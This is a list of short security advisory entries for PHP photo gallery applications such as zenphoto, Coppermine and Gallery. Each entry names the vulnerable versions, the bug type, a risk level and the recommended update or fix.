zenphoto Ajax File Manager Code Injection
Application: zenphoto
Affected Version: version 1.4.1.4 and prior versions.
Vendor’s URL: Ajax File Manager
Bug Type: Code Injection
Risk Level: Critical
Solution:
Update to version 1.4.1.5 or later.
Application: zenphoto
Affected Version: version 1.4.1.4 and prior versions.
Vendor’s URL: Ajax File Manager
Bug Type: Code Injection
Risk Level: Critical
Solution:
Update to version 1.4.1.5 or later.
Application: Ayco Resim Galeri
Affected Version:
Vendor’s URL: Ayco Resim Galeri
Bug Type: SQL Injection
Risk Level: Critical
Solution:
Edit the source code to ensure that input is properly sanitised.
Application: PHP Album
Affected Version: version 0.4.1.14.fix06 and other versions.
Vendor’s URL: PHP Album
Bug Type: Cross Site Scripting and system access
Risk Level: Critical
Solution:
Edit the source code to ensure that input is properly sanitised. Do not browse untrusted sites or follow untrusted links while being logged-in to the application.
Application: TFT Gallery
Affected Version: version 0.13.1
Vendor’s URL: TFT Gallery
Bug Type: File Inclusion
Risk Level: Critical
Solution:
Edit the source code to ensure that input is properly verified.
Application: GaleriaSHQIP
Affected Version: version 1.0 and other versions.
Vendor’s URL: GaleriaSHQIP
Bug Type: SQL Injection
Risk Level: Critical
Solution:
Edit the source code to ensure that input is properly sanitised.
Application: Coppermine Photo Gallery
Affected Version: version 1.4.22 and other versions.
Vendor’s URL: Coppermine Photo Gallery
Bug Type: SQL Injection and System access
Risk Level: Critical
Solution:
Set “magic_quotes_gpc” to “On” and “register_globals” to “Off”.
Application: Coppermine
Affected Version: version 1.4.20 and 1.4.21 and other versions.
Vendor’s URL: Coppermine Photo Gallery
Bug Type: Cross Site Scripting
Risk Level: Medium
Solution:
Update to version 1.4.21, which protects from exploitation via bbcode tags. Do not visit untrusted web sites while logged on to the application.
Application: Coppermine
Affected Version: version 1.4.19 and other versions.
Vendor’s URL: Photo Gallery
Bug Type: Security Bypass
Risk Level: Critical
Solution:
Update to version 1.4.20.
Application: Gallery
Affected Version: Gallery 1.x versions 1.5.8-svn-b34 and later
Vendor’s URL: Gallery
Bug Type: Security Bypass
Risk Level: Critical
Solution:
Update to version 1.5.10.
Application: Coppermine
Affected Version: version 1.4.18 and other versions.
Vendor’s URL: Photo Gallery
Bug Type: File Inclusion
Risk Level: Critical
Solution:
Update to version 1.4.19.
Application: Gallery
Affected Version: prior to 1.5.8
Vendor’s URL: Gallery
Bug Type:
Risk Level: Security Bypass, Cross Site Scripting
Solution:
Update to version 1.5.8.
Application: Zoph
Affected Version: prior to 0.7.0.5.
Vendor’s URL: Zoph
Bug Type: SQL Injection
Risk Level: Critical
Solution:
Update to version 0.7.0.5.
Application: Gallery
Affected Version: all 2.x versions before 2.2.5
Vendor’s URL: http://gallery.menalto.com/
Bug Type: Cross Site Scripting and Security Bypass
Risk Level: Medium
Solution:
Update to version 2.2.5. Remove password protection from any non-album items.
Application: PHP Image Gallery
Affected Version:
Vendor’s URL: PHP Image Gallery
Bug Type: Cross Site Scripting
Risk Level: Medium
Solution:
Edit the source code to ensure that input is properly sanitized.
Application: Galleristic
Affected Version: version 1.0 and other versions.
Vendor’s URL: Galleristic
Bug Type: SQL Injection
Risk Level: Critical
Solution:
Edit the source code to ensure that input is properly sanitized.
Application: Simple Gallery
Affected Version: 2.2 and other versions.
Vendor’s URL: Simple Gallery
Bug Type: Cross Site Scripting
Risk Level: Medium
Solution:
Edit the source code to ensure that input is properly sanitized.
Application: PHP Photo Gallery
Affected Version:
Vendor’s URL: PHP Photo Gallery
Bug Type: SQL Injection
Risk Level: Critical
Solution:
Edit the source code to ensure that input is properly sanitized.
Application: Gallery Script Lite
Affected Version:
Vendor’s URL: Gallery Script Lite
Bug Type: Information Disclosure
Risk Level: Critical
Solution:
Edit the source code to ensure that input is properly sanitized.
Application: KwsPHP ConcoursPhoto Module
Affected Version: 2.0 and prior version.
Vendor’s URL: KwsPHP ConcoursPhoto Module
Bug Type: SQL Injection
Risk Level: Critical
Solution:
Update to version 2.1.
Application: Coppermine Photo Gallery
Affected Version: 1.4.16 and other versions.
Vendor’s URL: Coppermine Photo Gallery
Bug Type: SQL Injection
Risk Level: Critical
Solution:
Update to version 1.4.17.